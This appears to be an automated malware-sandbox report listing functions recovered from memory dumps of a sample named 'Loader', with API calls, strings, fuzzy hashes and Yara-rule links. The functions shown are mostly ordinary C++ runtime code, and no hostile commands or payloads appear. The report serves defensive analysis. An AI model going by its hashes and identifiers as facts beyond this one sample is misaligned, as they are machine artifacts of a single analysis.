Opcode ID: 5fd37f092d825596af274dcf46c23d426e120de1a0a8c5040ce6e22073fe292b
Instruction ID: 7d7f422dcffaa4a3d08942f4e48e47780df11c4294aed7f1dc90a1f89130509e
Opcode Fuzzy Hash: 5fd37f092d825596af274dcf46c23d426e120de1a0a8c5040ce6e22073fe292b
Instruction Fuzzy Hash: 8D51A172600206AFEB259F60DD81EBB7AB9EF84710B15C12DFD0CDB251EB71DC1096A1

Function 00A6EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A6F005
AcquireSRWLockExclusive.KERNEL32(00A68E38), ref: 00A6F024
AcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F052
TryAcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F0AD
TryAcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F0C4

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: c0aaacc9264e5ab426cbfa1afb928365a20165ec20f65da9bb28ebd77ea6b136
Instruction ID: 3c4876ce82a86f408938425262c0dfb38033236a4ca8e44af2490a5ccdae6c9e
Opcode Fuzzy Hash: c0aaacc9264e5ab426cbfa1afb928365a20165ec20f65da9bb28ebd77ea6b136
Instruction Fuzzy Hash: FA41CE7160060ADFCB20CF65E48196AB3F4FF05311B214A3AE456C7542EB30F985CF51

Function 00A63C70 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A63CA5
std::_Lockit::_Lockit.LIBCPMT ref: 00A63CBF
std::_Lockit::~_Lockit.LIBCPMT ref: 00A63CE0
__Getctype.LIBCPMT ref: 00A63D92
std::_Lockit::~_Lockit.LIBCPMT ref: 00A63DD8

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
String ID:
API String ID: 3087743877-0
Opcode ID: 9b8849eedc1873b96fae1db90e0f9003de5b890ec9ca92f8b839b2602f58e04f
Instruction ID: ad58b44c167ffecb72605f8dc2742d8f04d56c0070b85e0996fd8f3210a1c214
Opcode Fuzzy Hash: 9b8849eedc1873b96fae1db90e0f9003de5b890ec9ca92f8b839b2602f58e04f
Instruction Fuzzy Hash: 3D411472E006188FCB14DF94D945BAABBB1FF94B20F14861AD8156B391DB35AA02CF91

Function 00A6D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A6D4C9
std::_Lockit::_Lockit.LIBCPMT ref: 00A6D4D3
int.LIBCPMT ref: 00A6D4EA

Part of subcall function 00A6C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00A6C1F6
Part of subcall function 00A6C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00A6C210

codecvt.LIBCPMT ref: 00A6D50D
std::_Lockit::~_Lockit.LIBCPMT ref: 00A6D544

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: 57a12361fb29d9a28319baff32e1bccf7faf0912e54352628924f5fec35a9451
Instruction ID: 549a932bb34eaa02d69d16fa49eac1dd923b0f3245091af4014775b450616e19
Opcode Fuzzy Hash: 57a12361fb29d9a28319baff32e1bccf7faf0912e54352628924f5fec35a9451
Instruction Fuzzy Hash: D801F931E001158FCF01EBA4CA15ABDBBB5AF84774F144509F416AB2C1CF349E01CB91

Function 00A6ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A6ADDE
std::_Lockit::_Lockit.LIBCPMT ref: 00A6ADE9
std::_Lockit::~_Lockit.LIBCPMT ref: 00A6AE57

Part of subcall function 00A6ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00A6ACC2

std::locale::_Setgloballocale.LIBCPMT ref: 00A6AE04
_Yarn.LIBCPMT ref: 00A6AE1A

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: c907e8c6c486f6321f9281281e31b46b114544bb6f2ec126abc6c695092fc004
Instruction ID: bba3bb878395a8f9f45b5f41a45fa0cbee2f85e58fd47b92d4b8f9956648e3f6
Opcode Fuzzy Hash: c907e8c6c486f6321f9281281e31b46b114544bb6f2ec126abc6c695092fc004
Instruction Fuzzy Hash: 8C018F75A006209FCB06FBA0DA5557D7BB5FFA4760B18401AE90667382CF396E42CF82

Function 00A61750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00A61783

Strings

ios_base::badbit set, xrefs: 00A61BFA, 00A61C20
ios_base::eofbit set, xrefs: 00A61BEA
ios_base::failbit set, xrefs: 00A61BEF

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: _strlen
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4218353326-1866435925
Opcode ID: 4aa337fb7c33b3d3aa20ce6b803985259d88ade1946a1d2b7094f707832c9f65
Instruction ID: 8c038087d7adb4ec4a3fea0282ccd6b1d770f7b1da51c6f88de01de2fb25fd3a
Opcode Fuzzy Hash: 4aa337fb7c33b3d3aa20ce6b803985259d88ade1946a1d2b7094f707832c9f65
Instruction Fuzzy Hash: 4FF15E75A006148FCB14CFA8C494BADBBF1FF88324F198269E815AB3A1D774AD45CF90

Function 00A6B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6B809

Strings

RCC, xrefs: 00A6B795
MOC, xrefs: 00A6B789
csm, xrefs: 00A6B7A1

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: e5cf386cc5ed18f57de0c76ba7bfa301251284fac922c732ae8a0c6d18e4ae28
Instruction ID: 977edcda10af2cb81a87c36a1541a1cb6a0b615a56c4058799bf19b2b53868b2
Opcode Fuzzy Hash: e5cf386cc5ed18f57de0c76ba7bfa301251284fac922c732ae8a0c6d18e4ae28
Instruction Fuzzy Hash: 2421F235921609DFCF389F94C956A6AB3BCEF54720F14851EE401CB690DB34AEC0CAA0

Function 00A86940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00A869DC,00000000,?,00A9D2B0,?,?,?,00A86913,00000004,InitializeCriticalSectionEx,00A90D34,00A90D3C), ref: 00A8694D
GetLastError.KERNEL32(?,00A869DC,00000000,?,00A9D2B0,?,?,?,00A86913,00000004,InitializeCriticalSectionEx,00A90D34,00A90D3C,00000000,?,00A7BBBC), ref: 00A86957
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00A8697F

Strings

api-ms-, xrefs: 00A86964

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f65367fe10e185bcfb5e365152d56166db8ff95fcd5d3947a3907ae331228a63
Instruction ID: ff6ab572dd5f14651975a567438a19e21c9f72231140478af9a3ffb5db01d59b
Opcode Fuzzy Hash: f65367fe10e185bcfb5e365152d56166db8ff95fcd5d3947a3907ae331228a63
Instruction Fuzzy Hash: 19E01A30380204BAEF202BA4EC06B6C3A55AF40B91F184421FA4CA84E0DB72ED659A44

Function 00A83F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00A84001

Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A84253
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A84299
GetLastError.KERNEL32 ref: 00A8433C

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 3370b4aea18a57f3358c20ef2349d52e25b981828188a954c9811ef19ecd71ba
Instruction ID: af67fe55dc6fe746bb720b8030332e92d1f80bd435cd9acea8b2d48c7f62dbe0
Opcode Fuzzy Hash: 3370b4aea18a57f3358c20ef2349d52e25b981828188a954c9811ef19ecd71ba
Instruction Fuzzy Hash: 1CD18A75E042599FCF15DFE8C880AEDBBB5FF18314F28812AE556EB351DA30A942CB50

Function 00A7B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00A7B35C
___AdjustPointer.LIBCMT ref: 00A7B37F
___AdjustPointer.LIBCMT ref: 00A7B41B

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 59dfb70806d0d85f25c38b8863c485caf8ae0c6ae1d41dd606411e49df2f9aa1
Instruction ID: a9501bef1a6f980798829842158267077c8b86dc42314fd93464d49e88976da1
Opcode Fuzzy Hash: 59dfb70806d0d85f25c38b8863c485caf8ae0c6ae1d41dd606411e49df2f9aa1
Instruction Fuzzy Hash: 4C51D6B2614601DFDB259F54CD91BAA77B4EF00710F14C52DF80A5B691E731EC90DBA0

Function 00A67220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A672C5
std::_Throw_Cpp_error.LIBCPMT ref: 00A67395
std::_Throw_Cpp_error.LIBCPMT ref: 00A673A3
std::_Throw_Cpp_error.LIBCPMT ref: 00A673B1

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 42672d4b11369948661716f96d95b833ed561cdfecd4e537f0afa20b016a2b92
Instruction ID: 51274188e0dfa814c27309d5479e5cc069075e2aa0671c2f8de60154cff883df
Opcode Fuzzy Hash: 42672d4b11369948661716f96d95b833ed561cdfecd4e537f0afa20b016a2b92
Instruction Fuzzy Hash: C341F2B1A10705CBDB21EB64C941B6FB7B4FF44324F144639E81A9B791EB34E854CBA1

Function 00A64460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A64495
std::_Lockit::_Lockit.LIBCPMT ref: 00A644B2
std::_Lockit::~_Lockit.LIBCPMT ref: 00A644D3
std::_Lockit::~_Lockit.LIBCPMT ref: 00A64580

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: ab027e4d7b57a91f7da35171771344f7813b4c2021c24606e958d49bfde184da
Instruction ID: 351164fa42ca7d1bffc9114f7faf328be23733283236ffb462b42f7c2f6d7cdb
Opcode Fuzzy Hash: ab027e4d7b57a91f7da35171771344f7813b4c2021c24606e958d49bfde184da
Instruction Fuzzy Hash: 3F415A71E006188FCF10DF94D984BAEBBB1FB58720F54422AE81667391DB34AD45CFA1

Function 00A81DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00A81E2A
__dosmaperr.LIBCMT ref: 00A81E31
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00A81E6B
__dosmaperr.LIBCMT ref: 00A81E72

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 9372ba9eb66a07567814e8d4709f872f98e8dbcfbbdfdf4f8aac78a35a84ccea
Instruction ID: dd352559415253203dca709655dc7e4247e9334294009602ad57bb7e2663740e
Opcode Fuzzy Hash: 9372ba9eb66a07567814e8d4709f872f98e8dbcfbbdfdf4f8aac78a35a84ccea
Instruction Fuzzy Hash: C8214971A04615AF9B20BFA58D8197BB7ADFF043A4B10C529FC5997251EB30EC52CBA0

Function 00A72BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b686c06bb96557f0fd5673744bd842f35e67783c990ad791a3095880dfe24b24
Instruction ID: 00bb091ea908a6fa78bf4402a64e1aca65b1330daf56ea27e254d175ef5f384a
Opcode Fuzzy Hash: b686c06bb96557f0fd5673744bd842f35e67783c990ad791a3095880dfe24b24
Instruction Fuzzy Hash: FF21CD71204205AFDB22AFB5CD90A6E77A8FFA03A4B10C529F85D97250EB30EC50C7A0

Function 00A831BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A831C6

Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A831FE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A8321E

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 9a37f0a1ffadcf76fd061f04b21aff88caf6e94ba6aa8790b06e4fc169ef8430
Instruction ID: ec1fd254cad5b85a14ca9e709afa38019965317abf40ac1e68b9277712781818
Opcode Fuzzy Hash: 9a37f0a1ffadcf76fd061f04b21aff88caf6e94ba6aa8790b06e4fc169ef8430
Instruction Fuzzy Hash: B711D2F2A025197EAB2137B69D8ADFF6A6CDEA5B947108025FA05D1100FF64DF0182B1

Function 00A6E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A6E899
std::_Lockit::_Lockit.LIBCPMT ref: 00A6E8A3
int.LIBCPMT ref: 00A6E8BA

Part of subcall function 00A6C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00A6C1F6
Part of subcall function 00A6C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00A6C210

std::_Lockit::~_Lockit.LIBCPMT ref: 00A6E914

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: eac22b5fe8e8e63d99b39b6309b85145b99bb2603a2f3c6ad8da17ff56e51bc3
Instruction ID: eb02c8ed2b923fd73248b20435ec8ca557fe320b61752efea3f610d6c79af024
Opcode Fuzzy Hash: eac22b5fe8e8e63d99b39b6309b85145b99bb2603a2f3c6ad8da17ff56e51bc3
Instruction Fuzzy Hash: FF11C036A001199FCF05EBB4DA55ABDBBB1AF94724F250119F411AB2D2CF749E01CF91

Function 00A8ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000), ref: 00A8ADB7
GetLastError.KERNEL32(?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?,?,?,00A83CD6,00000000), ref: 00A8ADC3

Part of subcall function 00A8AE20: CloseHandle.KERNEL32(FFFFFFFE,00A8ADD3,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?,?), ref: 00A8AE30

___initconout.LIBCMT ref: 00A8ADD3

Part of subcall function 00A8ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A8AD91,00A8A2DC,?,?,00A84390,?,00000000,00000000,?), ref: 00A8AE08

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?), ref: 00A8ADE8

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
